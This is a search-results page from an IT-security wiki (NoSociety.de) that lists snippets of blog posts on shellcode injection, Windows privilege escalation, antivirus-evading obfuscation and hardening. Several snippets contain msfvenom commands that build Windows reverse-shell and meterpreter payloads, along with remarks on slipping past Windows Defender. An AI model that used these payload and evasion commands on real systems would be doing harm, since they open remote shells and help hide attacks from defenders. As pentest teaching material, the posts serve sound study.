NoSociety.de

#nosoc

  • Seiten-Werkzeuge
    Seite anzeigenÄltere VersionenLinks hierher
  • Webseiten-Werkzeuge
    Letzte ÄnderungenMedien-ManagerÜbersicht
  • Benutzer-Werkzeuge
    Anmelden

Suche

Unten sind die Ergebnisse Ihrer Suche gelistet.

Genaue Treffer
  • Genaue Treffer
  • Beginnt mit
  • Endet mit
  • Enthält
@en:it-security
  • Alle Namensräume
  • en:it-security:blog (10)
Jederzeit
  • Jederzeit
  • Letzte Woche
  • Letzter Monat
  • letztes Jahr
Sortiere nach Treffer
  • Sortiere nach Treffer
  • Sortiere nach letzter Änderung

Passende Seitennamen:

  • Privilege escalation: Windows admin thanks to Linux

Volltextergebnisse:

FatCat Attack PoC @en:it-security:blog
8 Treffer, Zuletzt geändert: vor 17 Monaten
| Privilege Escalation((https://github.com/frizb/Windows-Privilege-Escalation)) | AlwaysInstallElevated ((https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated)) | | @#58D3F7:**Actions on Objectives*... rate payload <code dos>msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.
Obfuscation: Disguise shellcode as UUIDs @en:it-security:blog
8 Treffer, Zuletzt geändert: vor 10 Monaten
{{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: Disguise shellcode a... hat I used for testing was immediately blocked by Windows Defender. I therefore had to adapt the loader and... yption or encoding. This is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT
Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
8 Treffer, Zuletzt geändert: vor 10 Monaten
{{tag>it-security windows linux blog english}} ====== Privilege escalation: Windows admin thanks to Linux ====== In this tutorial, ... ll show you how to secure administrator rights on Windows PCs using a live boot CD. We will simulate two sc... ystem. \\ \\ ===== Initial situation ===== On a Windows system, the users ''users'' and ''sysadmin'' are
Shellcode Injection Part 2 @en:it-security:blog
7 Treffer, Zuletzt geändert: vor 11 Monaten
{{tag>it-security windows kali pentest blog english}} ====== Shellcode Injection Part 2 ====== {{it-securi... . This form of injection is usually recognised by Windows Defender, so we will again use some obfuscation m... r. The output is binary: <code bash> msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.28.126.97 LPORT=4... ub.com/fritzone/obfy )) was an immediate success. Windows Defender could no longer recognise the compiled f
Shellcode Injection Part 1 @en:it-security:blog
6 Treffer, Zuletzt geändert: vor 11 Monaten
{{tag>it-security windows kali pentest blog english}} ====== Shellcode Injection Part 1 ====== In this ser... ve to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -... ocess-injection.cpp> #include <stdio.h> #include <Windows.h> //shell.c unsigned const char payload[] = "\... shellcode in raw format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -
Group Managed Service Accounts
5 Treffer, Zuletzt geändert: vor 17 Monaten
{{tag>english startpage it-security windows active-directory}} ====== Group Managed Service Accounts ======... from Microsoft on this: > As of the October 2018 Windows 10 update, RSAT is included as a collection of features on demand in Windows 10 itself. Instead of downloading an RSAT package... es page. <sup>[[https://learn.microsoft.com/de-de/windows-server/remote/remote-server-administration-tools]
SMB Hardening
5 Treffer, Zuletzt geändert: vor 17 Monaten
{{tag>english startpage it-security windows active-directory}} ====== SMB Hardening ====== ===== Technical... und here: <code> Computerkonfiguration -> Windows-Einstellungen -> Sicherheitseinstellungen... ings can also be set in the registry. <code reg> Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE... === <code text> Computerkonfiguration -> Windows-Einstellungen -> Sicherheitseinstellungen
Shellcode Injection Part 4 @en:it-security:blog
5 Treffer, Zuletzt geändert: vor 10 Monaten
{{tag>IT-Security Windows Kali pentest blog english}} ====== Shellcode Injection Part 4 ====== {{it-securi... ts should be met: * Start of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ==... e address ==== Each time a process is started in Windows, modules are loaded into this process. One of these modules is our ''kernel32.dll''. Windows creates data structures in the working memory tha
Obfuscation: polymorphic in-memory decoder @en:it-security:blog
3 Treffer, Zuletzt geändert: vor 9 Monaten
{{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: polymorphic in-memor... pile it. <code cpp> #include <stdio.h> #include <windows.h> #include <iostream> #pragma warning unsigned ... on tests. During my test, even the Metasploit payload was not detected by Windows Defender. ~~DISCUSSION~~
IT Security Cheat Sheets
2 Treffer, Zuletzt geändert: vor 17 Monaten
ecurity bypass bins | [[ghio>gtfobins ]] | ^::: | Windows security bypass bins | [[ghio>lolbas-project ]] |... ed | [[gh>aleff-github/my-flipper-shits/tree/main/Windows/Execution/Install_And_Run_Any_Arbitrary_Executabl
Secure passwords
2 Treffer, Zuletzt geändert: vor 17 Monaten
password for each site * Follow the basic [[en:windows:security:basics|Windows security tips]] * Never share passwords ===== 6.0 Multifactor authentication =
Shellcode Injection Part 3 @en:it-security:blog
2 Treffer, Zuletzt geändert: vor 12 Monaten
{{tag>IT-Security Windows Kali pentest blog english}} ====== Shellcode Injection Part 3 ====== {{it-securi... e === We have to create the shellcode as ''%%x86 Windows%%'' binary file. We do this with ''%%nasm%%'': <
64-Bit Stack CheatSheet
1 Treffer, Zuletzt geändert: vor 10 Monaten
ed as follows ((https://learn.microsoft.com/de-de/windows-hardware/drivers/debugger/x64-architecture)) ((ht
The importance of awareness in IT security @en:it-security:blog
1 Treffer, Zuletzt geändert: vor 11 Monaten
file that was sent as an attachment in an email. Windows integrated it and the malware was able to spread.
Obfuscation: ByteSwapping @en:it-security:blog
1 Treffer, Zuletzt geändert: vor 7 Monaten
{{tag>IT-Security Windows Kali shellcode blog english}} ====== Obfuscation: ByteSwapping ====== {{it-secu